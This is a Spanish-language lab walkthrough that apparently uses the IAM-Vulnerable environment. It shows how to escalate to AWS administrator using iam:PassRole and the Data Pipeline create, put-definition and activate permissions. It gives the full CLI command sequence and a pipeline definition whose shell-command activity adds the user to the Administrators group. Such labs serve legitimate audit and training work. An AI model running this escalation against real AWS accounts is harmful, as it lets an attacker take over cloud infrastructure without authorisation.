PassExistingRoleToNewDataPipeline

Un atacante con los permisos iam:PassRole , datapipeline:CreatePipeline y datapipeline:PutPipelineDefinition podría aumentar los privilegios creando una pipeline y actualizándola para ejecutar un comando arbitrario de AWS CLI o crear otros recursos.

Luego del despliegue del laboratorio de IAM-Vulnerable, nos vamos a encontrar el siguiente usuario:

Este usuario tiene la siguiente política:

Este usuario tiene el siguiente rol:

Otra manera de validar lo anterior, es por medio del siguiente comando ya explicado:

Listando las políticas del usuario que será auditado:

aws iam list-attached-user-policies --user-name privesc21-PassExistingRoleToNewDataPipeline-user

Obteniendo información relevante para nuestra auditoria utilizando el ARN de la política del usuario auditado:

aws iam get-policy-version --policy-arn arn:aws:iam::037572360634:policy/privesc21-PassExistingRoleToNewDataPipeline --version-id v1

Para este escenario estaremos utilizando el siguiente rol:

Este rol será necesario para realizar la demostración de esta técnica y representará un rol privilegiado que será asociado a un pipeline.

Ahora con nuestro usuario administrador, vamos a generar unas credenciales con STS sobre dicho usuario.

aws sts assume-role --role-arn arn:aws:iam::037572360634:role/privesc21-PassExistingRoleToNewDataPipeline-role --role-session-name privesc21

Por lo anterior, tenemos que autenticarnos con el comando aws configure y validar con el comando aws sts get-caller-identity.

aws configure --profile privesc21

El token se especificará dentro del archivo plano de credenciales.

aws sts get-caller-identity --profile privesc21

Si intentamos agregarnos al grupo de administradores, vamos a obtener un error de permisos:

aws iam add-user-to-group --group-name Group-Root-Spartan --user-name privesc21-PassExistingRoleToNewDataPipeline-user --profile privesc21

En este escenario, tenemos que aprovechar del privilegio de datapipeline:CreatePipeline para crear un pipeline.

Posteriormente, utilizaremos el permiso datapipeline:PutPipelineDefinition para actualizar la definición de nuestro pipeline y esta será la encargada de adicionar nuestro usuario inicial al grupo de administradores.

Para la creación del pipeline, tenemos que utilizar una plantilla en donde se especifique que recursos serán creados.

En este ejemplo, el atacante activará una instancia EC2.

A continuación, se muestra el comando para crear un pipeline:

aws datapipeline create-pipeline --name privesc --unique-id privesctest --profile privesc21

En la evidencia previa, podemos apreciar el valor del PipelineID que fue retornado después de ejecutar el comando para crear el pipeline malicioso.

Ahora que hemos creado nuestro pipeline malicioso, vamos aprovechar nuestro otro privilegio de datapipeline:PutPipelineDefinition para actualizar el pipeline y especificar la definición.

La definición del pipeline tiene el siguiente contenido:

Puedes descargar el pipeline desde el siguiente enlace:

{
     "objects": [
     {
         "id" : "CreateDirectory",
         "type" : "ShellCommandActivity",
         "command" : "aws iam add-user-to-group --group-name Administrators --user-name privesc21-PassExistingRoleToNewDataPipeline-user",
         "runsOn" : {"ref": "instance"}
     },
     {
         "id": "Default",
         "scheduleType": "ondemand",
         "failureAndRerunMode": "CASCADE",
         "name": "Default",
         "role": "privesc-high-priv-service-role",
         "resourceRole": "privesc-high-priv-service-profile"
     },
     {
         "id" : "instance",
         "name" : "instance",
         "type" : "Ec2Resource",
         "actionOnTaskFailure" : "terminate",
         "actionOnResourceFailure" : "retryAll",
         "maximumRetries" : "1",
         "instanceType" : "t2.micro",
         "securityGroups" : ["launch-wizard-1"],
         "keyPair" : "ssh_keys",
         "role" : "privesc-high-priv-service-role",
         "resourceRole" : "privesc-high-priv-service-profile"
     }]
}

El comando para actualizar la definición del pipeline recién creado es:

Debemos tener en cuenta que el valor del pipeline-id fue extraído por el comando previamente explicado.

aws datapipeline put-pipeline-definition --pipeline-id df-07792257LS8Z17HL0Z5 --pipeline-definition file://pipeline-spartan.json --profile privesc21 

En la evidencia previa, podemos ver como AWS emite algunas advertencias, pero el resultado indica que el comando no se equivocó y, por lo tanto, tuvo éxito.

Finalmente, para ejecutar el pipeline, el atacante debe activarla. Si tiene éxito, este comando no proporciona ningún resultado:

aws datapipeline activate-pipeline --pipeline-id df-07792257LS8Z17HL0Z5 --profile privesc21

La instancia EC2 tarda un par de minutos en activarse, pero una vez que lo hace, el comando definido en la definición de pipeline de datos se ejecutará y agregará la cuenta del atacante al grupo de administración.

Después de un tiempo, si validamos los integrantes del grupo administrativo lograremos apreciar nuestro usuario:

Finalmente, hemos comprometido exitosamente un rol administrativo por medio de la técnica previamente explicada.